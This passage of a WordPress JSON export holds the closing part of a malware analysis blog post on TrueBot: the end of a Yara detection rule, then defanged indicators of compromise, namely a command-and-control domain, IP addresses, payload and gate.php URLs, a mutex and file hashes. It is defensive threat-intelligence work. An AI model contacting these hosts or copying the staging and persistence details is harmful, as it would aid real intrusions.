10.5pt;color: #448c27\">*.JSONIP<\/span><\/b><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #777777\">&#8220;<\/span><\/b><b> <\/b><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #4b69c6\">wide<\/span><\/b><b> <\/b><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #4b69c6\">ascii<\/span><\/b><\/p>\n<p class=\"MsoNormal\" style=\"margin-bottom: 0cm;text-align: left;line-height: 14.25pt;background: whitesmoke;border: none;padding: 0cm\" align=\"left\"><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #333333\">\u00a0 \u00a0 \u00a0 \u00a0<\/span><\/b><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #9c5d27\">$<\/span><\/b><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #7a3e9d\">jsonip_path<\/span><\/b><b> <\/b><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #777777\">=<\/span><\/b><b> <\/b><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #777777\">&#8220;<\/span><\/b><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #448c27\">%s<\/span><\/b><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #777777\">\\\\<\/span><\/b><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #448c27\">%s.JSONIP<\/span><\/b><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #777777\">&#8220;<\/span><\/b><b> <\/b><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #4b69c6\">wide<\/span><\/b><b> <\/b><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #4b69c6\">ascii<\/span><\/b><\/p>\n<p class=\"MsoNormal\" style=\"margin-bottom: 0cm;text-align: left;line-height: 14.25pt;background: whitesmoke;border: none;padding: 0cm\" align=\"left\"><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #333333\">\u00a0 \u00a0 \u00a0 \u00a0<\/span><\/b><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #9c5d27\">$<\/span><\/b><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #7a3e9d\">uri<\/span><\/b><b> <\/b><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #777777\">=<\/span><\/b><b> 
<\/b><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #777777\">&#8220;<\/span><\/b><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #448c27\">\/gate.php<\/span><\/b><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #777777\">&#8220;<\/span><\/b><b> <\/b><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #4b69c6\">wide<\/span><\/b><b> <\/b><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #4b69c6\">ascii<\/span><\/b><\/p>\n<p class=\"MsoNormal\" style=\"margin-bottom: 0cm;text-align: left;line-height: 14.25pt;background: whitesmoke;border: none;padding: 0cm\" align=\"left\"><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #333333\">\u00a0<\/span><\/p>\n<p class=\"MsoNormal\" style=\"margin-bottom: 0cm;text-align: left;line-height: 14.25pt;background: whitesmoke;border: none;padding: 0cm\" align=\"left\"><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #333333\">\u00a0 \u00a0 \u00a0 \u00a0<\/span><\/b><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #9c5d27\">$<\/span><\/b><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #7a3e9d\">schedtask_name1<\/span><\/b><b> <\/b><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #777777\">=<\/span><\/b><b> <\/b><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #777777\">\/<\/span><\/b><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #4b69c6\">MicrosoftEdgeUpdateTaskMachineCore<\/span><\/b><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #777777\">\\{[<\/span><\/b><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #9c5d27\">A-Fa-f0-9<\/span><\/b><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #777777\">\\-]+\\}\/<\/span><\/b><\/p>\n<p class=\"MsoNormal\" style=\"margin-bottom: 0cm;text-align: left;line-height: 14.25pt;background: whitesmoke;border: none;padding: 0cm\" align=\"left\"><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #333333\">\u00a0 \u00a0<\/span><\/b><b><span lang=\"EN-US\" style=\"font-size: 
10.5pt;color: #4b69c6\">condition<\/span><\/b><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #333333\">:<\/span><\/b><\/p>\n<p class=\"MsoNormal\" style=\"margin-bottom: 0cm;text-align: left;line-height: 14.25pt;background: whitesmoke;border: none;padding: 0cm\" align=\"left\"><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #333333\">\u00a0 \u00a0 \u00a0 \u00a0<\/span><\/b><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #aa3731\">uint16<\/span><\/b><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #333333\">(<\/span><\/b><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #9c5d27\">0<\/span><\/b><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #333333\">) <\/span><\/b><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #777777\">==<\/span><\/b><b> <\/b><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #9c5d27\">0x5A4D<\/span><\/b><b> <\/b><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #777777\">and<\/span><\/b><b> <\/b><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #9c5d27\">any<\/span><\/b><b> <\/b><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #4b69c6\">of<\/span><\/b><b> <\/b><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #9c5d27\">them<\/span><\/b><\/p>\n<p class=\"MsoNormal\" style=\"margin-bottom: 0cm;text-align: left;line-height: 14.25pt;background: whitesmoke;border: none;padding: 0cm\" align=\"left\"><span style=\"font-size: 10.5pt;color: #777777\">}<\/span><\/p>\n\n<\/div>\n<!-- \/wp:html -->\n\n<!-- wp:spacer {\"height\":\"64px\"} -->\n<div class=\"wp-block-spacer\" style=\"height: 64px\" aria-hidden=\"true\"><\/div>\n<!-- \/wp:spacer -->\n\n<!-- wp:heading {\"textAlign\":\"center\"} -->\n<h2 class=\"wp-block-heading has-text-align-center\">Indicators of Compromise (IOCs)<\/h2>\n<!-- \/wp:heading -->\n\n<!-- wp:paragraph -->\nThe following indicators of compromise were extracted from the analysis carried out:\n<!-- \/wp:paragraph -->\n\n<!-- wp:paragraph 
-->\n<strong>Domains<\/strong>\n<!-- \/wp:paragraph -->\n\n<!-- wp:list -->\n<ul>\n<!-- wp:list-item -->\n<li>droogggdhfhf[.]com<\/li>\n<!-- \/wp:list-item -->\n<\/ul>\n<!-- \/wp:list -->\n\n<!-- wp:paragraph -->\n<strong>IP<\/strong>\n<!-- \/wp:paragraph -->\n\n<!-- wp:list -->\n<ul>\n<!-- wp:list-item -->\n<li>62[.]204[.]41[.]69<\/li>\n<!-- \/wp:list-item -->\n<!-- wp:list-item -->\n<li>92[.]118[.]36[.]236<\/li>\n<!-- \/wp:list-item -->\n<\/ul>\n<!-- \/wp:list -->\n\n<!-- wp:paragraph -->\n<strong>URL<\/strong>\n<!-- \/wp:paragraph -->\n\n<!-- wp:list -->\n<ul>\n<!-- wp:list-item -->\n<li>hxxp:\/\/62[.]204[.]41[.]69\/dll.png<\/li>\n<!-- \/wp:list-item -->\n<!-- wp:list-item -->\n<li>hxxp:\/\/62[.]204[.]41[.]69\/ldn.dll<\/li>\n<!-- \/wp:list-item -->\n<!-- wp:list-item -->\n<li>hxxp:\/\/droogggdhfhf[.]com\/gate.php<\/li>\n<!-- \/wp:list-item -->\n<\/ul>\n<!-- \/wp:list -->\n\n<!-- wp:paragraph -->\n<strong>Mutex<\/strong>\n<!-- \/wp:paragraph -->\n\n<!-- wp:list -->\n<ul>\n<!-- wp:list-item -->\n<li>(u3qkfewi3ujrk32lqpti32ofwq<\/li>\n<!-- \/wp:list-item -->\n<\/ul>\n<!-- \/wp:list -->\n\n<!-- wp:paragraph -->\n<strong>Hash<\/strong>\n<!-- \/wp:paragraph 
-->\n\n<!-- wp:list -->\n<ul>\n<!-- wp:list-item -->\n<li><strong>information_7_apr-4753978.js:<\/strong> 8A2AA35F1E8E8186A0F4A6684D3CAB54E093914B2DBA38F59D5D01C6EE6AAF04<\/li>\n<!-- \/wp:list-item -->\n<!-- wp:list-item -->\n<li><strong>NoSleep.dll:<\/strong> b803db527f146f0d356700e24836a2e888f74c3dd2196a99f73caa0e57007f34<\/li>\n<!-- \/wp:list-item -->\n<\/ul>\n<!-- \/wp:list -->\n\n<!-- wp:paragraph -->\n<strong>Hashes identified using the Yara rule<\/strong>\n<!-- \/wp:paragraph 
-->","protected":false},"excerpt":{"rendered":"<p>After recent online publications regarding the TrueBot malware (VMware, Bleeping and THN), we have decided to contributing with our analysis of this potential new threat. At the end, you will find the indicators of compromise and a Yara rule to identify it. Before starting with the technical analysis of the malware, we believe it is [&hellip;]<\/p>\n","protected":false},"author":12,"featured_media":6562,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[2483],"tags":[213],"class_list":["post-6991","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-malware-analysis","tag-malware-analysis"],"_links":{"self":[{"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/posts\/6991","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/users\/12"}],"replies":[{"embeddable":true,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/comments?post=6991"}],"version-history":[{"count":7,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/posts\/6991\/revisions"}],"predecessor-version":[{"id":7042,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/posts\/6991\/revisions\/7042"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/media\/6562"}],"wp:attachment":[{"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/media?parent=6991"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/categories?post=6991"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/tags?post=6991"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templ
ated":true}]}}